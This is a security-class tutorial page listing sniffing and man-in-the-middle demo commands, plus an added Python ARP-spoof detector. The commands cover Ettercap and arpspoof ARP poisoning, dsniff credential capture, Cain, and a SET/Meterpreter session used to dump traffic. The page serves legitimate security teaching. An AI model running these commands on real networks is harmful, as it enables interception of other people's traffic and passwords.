Network Sniffers Class for the Kentuckiana ISSA 2011 (Hacking Illustrated Series InfoSec Tutorial Videos)

We decided to put on another sniffers class. This time Gary Hampton joins me to impart his knowledge of using Wireshark to diagnose problems on wireless networks. I cover the usual suspects: TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMiner, Firesheep and Xplico. I lost part of Gary's on-screen demo when my recording rig froze up, and I apparently did not make a proper sacrifice to the demo gods for my section when I tried to show off Ettercap filters, but I hope you still find it informative.

Part 1: Intro to Sniffers

Download: http://www.archive.org/download/IssaSniffersClass/sniffers1.avi

Part 2: Wireshark and Wireless with Gary Hampton

Download: http://www.archive.org/download/IssaSniffersClass/sniffers2.avi

Part 3: A little more Wireshark, TCPDump, Metasploit sniffing with Meterpreter, ARP Poisoning, Ettercap, Cain, NetworkMiner, Firesheep, Xplico and bridging.

Download: http://www.archive.org/download/IssaSniffersClass/sniffers3.avi 

Adrian's Slides

Gary's Slides

Commands used:

Wireshark Demo

1. Run Wireshark

2. Basic start capture

3. Start capture with options

4. Drill down OSI

5. Capture filter options (4.9 in book)
   not tcp port 3389
   not broadcast and not multicast

6. Show a packet

7. Pop a packet out

8. Sort by columns

9. Follow stream (web traffic)

10. Export HTTP Objects

11. Simple view filters
    tcp.port == 80
    !(ip.addr == 192.168.1.13)

12. Filter builder

13. Apply filters from different panes (packet vs. details panes).

14. Save filters

15. Open a Wiki page

16. Edit -> Find packet

17. Analyzers -> Expert Info

18. Analyzers -> Firewall ACLs

19. Stats

20. Color rules

21. Save capture

22. Mention Lua

Dumpcap/TCPDump

    dumpcap -D
    dumpcap -i eth0 -s 0 -f "port 80" -w webtraffic.pcap

Sniffing in Monitor mode

   ifconfig wlan0 down
   iwconfig wlan0 mode monitor
   iwconfig wlan0 channel 1
   ifconfig wlan0 up

Ettercap Demo

1. ettercap -T -q -i eth0 -M ARP // //

2. ettercap -T -q -i eth0 -M ARP // /10.1.1.1/

3. Show ARP traffic

4. Telnet to 10.1.1.1

5. http to 10.1.1.1

6. FTP/Telnet/HTTP someplace with a password

7. Show find sniffers
   ettercap -G
   ettercap -T -i eth0 -P list
   ettercap -T -i eth0 -P search_promisc //

8. Filters:
   etterfilter ig.filter -o ig.ef
   ettercap -T -q -F ig.ef -M ARP // //

9. Mention MITM: icmp, dhcp, port filters

10. driftnet -i eth0

11. Etherape

Cain Demo

1. Start poisoning

2. Telnet to 10.1.1.1

3. http to 10.1.1.1

4. FTP/Telnet/HTTP someplace with a password

5. SSL someplace from VM

6. Sniff RDP

ARPSpoof Demo

   cat /proc/sys/net/ipv4/ip_forward
   echo 1 > /proc/sys/net/ipv4/ip_forward
   arpspoof -i eth0 10.0.0.1
   arpspoof -i eth0 -t 10.0.0.113 10.0.0.1
   dsniff -i eth0 -c
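
The ARP poisoning run in the Ettercap and ARPSpoof demos above leaves a trace a defender can look for: an IP address that was answering from one MAC suddenly answers from another. The following is an added detection example, not part of the class materials and not code from any of the tools above. It parses raw Ethernet/ARP frames, records the first MAC seen in an ARP reply for each sender IP, and reports any later reply that claims the same IP from a different MAC. The frames, the MAC addresses and the function names are constructed for this example; the IPs reuse the 10.0.0.1 gateway and 10.0.0.113 victim from the arpspoof demo.

```python
import struct

# Wire formats (big-endian): Ethernet II header and an IPv4-over-Ethernet ARP packet.
ETH_HDR = struct.Struct("!6s6sH")            # dst MAC, src MAC, ethertype
ARP_PKT = struct.Struct("!HHBBH6s4s6s4s")    # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ETHERTYPE_IPV4 = 0x0800
ARP_REPLY = 2


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def ip_str(raw):
    return ".".join(str(b) for b in raw)


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip) for an
    Ethernet/IPv4 ARP frame, or None for anything else (non-ARP, truncated)."""
    if len(frame) < ETH_HDR.size + ARP_PKT.size:
        return None
    _dst, _src, ethertype = ETH_HDR.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_PKT.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, ETHERTYPE_IPV4, 6, 4):
        return None
    return op, mac_str(sha), ip_str(spa), mac_str(tha), ip_str(tpa)


def detect_arp_spoof(frames):
    """Keep the first MAC seen answering for each IP in ARP replies and report
    every later reply that claims the same IP from a different MAC.
    Returns a list of (frame_index, ip, expected_mac, observed_mac)."""
    bindings = {}   # ip -> first MAC seen in an ARP reply (the baseline)
    alerts = []
    for idx, frame in enumerate(frames):
        parsed = parse_arp(frame)
        if parsed is None:
            continue
        op, sha, spa, _tha, _tpa = parsed
        if op != ARP_REPLY:
            continue
        expected = bindings.setdefault(spa, sha)
        if expected != sha:
            alerts.append((idx, spa, expected, sha))
    return alerts


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """Construct a unicast ARP reply frame (test-data helper for this example)."""
    sha = bytes.fromhex(sender_mac.replace(":", ""))
    tha = bytes.fromhex(target_mac.replace(":", ""))
    spa = bytes(int(o) for o in sender_ip.split("."))
    tpa = bytes(int(o) for o in target_ip.split("."))
    return (ETH_HDR.pack(tha, sha, ETHERTYPE_ARP)
            + ARP_PKT.pack(1, ETHERTYPE_IPV4, 6, 4, ARP_REPLY, sha, spa, tha, tpa))


# Constructed sample traffic: legitimate replies between the gateway 10.0.0.1
# and the victim 10.0.0.113, a repeat that must not alert, a poisoned reply
# claiming the gateway's IP from a third MAC, and an unrelated IPv4 frame
# that the parser must skip. All MAC addresses are made up.
GATEWAY_MAC = "00:11:22:33:44:01"
VICTIM_MAC = "00:11:22:33:44:71"
ROGUE_MAC = "de:ad:be:ef:00:01"
SAMPLE_FRAMES = [
    build_arp_reply(GATEWAY_MAC, "10.0.0.1", VICTIM_MAC, "10.0.0.113"),
    build_arp_reply(VICTIM_MAC, "10.0.0.113", GATEWAY_MAC, "10.0.0.1"),
    build_arp_reply(GATEWAY_MAC, "10.0.0.1", VICTIM_MAC, "10.0.0.113"),   # same MAC again: no alert
    build_arp_reply(ROGUE_MAC, "10.0.0.1", VICTIM_MAC, "10.0.0.113"),     # poisoned reply
    ETH_HDR.pack(bytes.fromhex(VICTIM_MAC.replace(":", "")),
                 bytes.fromhex(GATEWAY_MAC.replace(":", "")),
                 ETHERTYPE_IPV4) + bytes(28),                              # not ARP
]

if __name__ == "__main__":
    for idx, ip, expected, observed in detect_arp_spoof(SAMPLE_FRAMES):
        print(f"frame {idx}: {ip} now answers from {observed}, first seen at {expected}")
```

On a real capture, feed the detector the frames read from a pcap (the Wireshark display filter `arp.opcode == 2` isolates the same replies by hand). A binding change is not proof of poisoning on its own: a DHCP lease moving to another host, a router failover or a VM migration also rebinds an IP, so in practice compare the observed MAC against the DHCP lease table or a pinned gateway MAC before acting on the alert.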

NetworkMiner

1. TCP fingerprinting

2. Host details

3. DHCP fingerprinting

4. File capture

5. Passwords

6. Plaintext

7. Open pcap

Bridging in Linux setup

    sudo apt-get install bridge-utils   

Script to setup MAC bridging:

    ifconfig eth0 0.0.0.0
    ifconfig eth1 0.0.0.0
    brctl addbr mybridge
    brctl addif mybridge eth0
    brctl addif mybridge eth1
    ifconfig mybridge up

Things to show while bridged

    ifconfig
    sudo tcpdump -i mybridge -s 0 -w out.cap
    sudo etherape -i mybridge
    sudo driftnet -i mybridge

Metasploit/SET

   Backtrack->Penetration->SET
   Menu Choices 2, 1, 2 (Google.com), 2, 2, default, no
   <go to page>
   sessions -i 1
   use sniffer
   help
   sniffer_interfaces
   sniffer_start 2
   sniffer_dump 2 /tmp/all.cap
   <Show in Wireshark>

More at http://www.offensive-security.com/metasploit-unleashed/Packet_Sniffing_With_Meterpreter

If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2020, IronGeek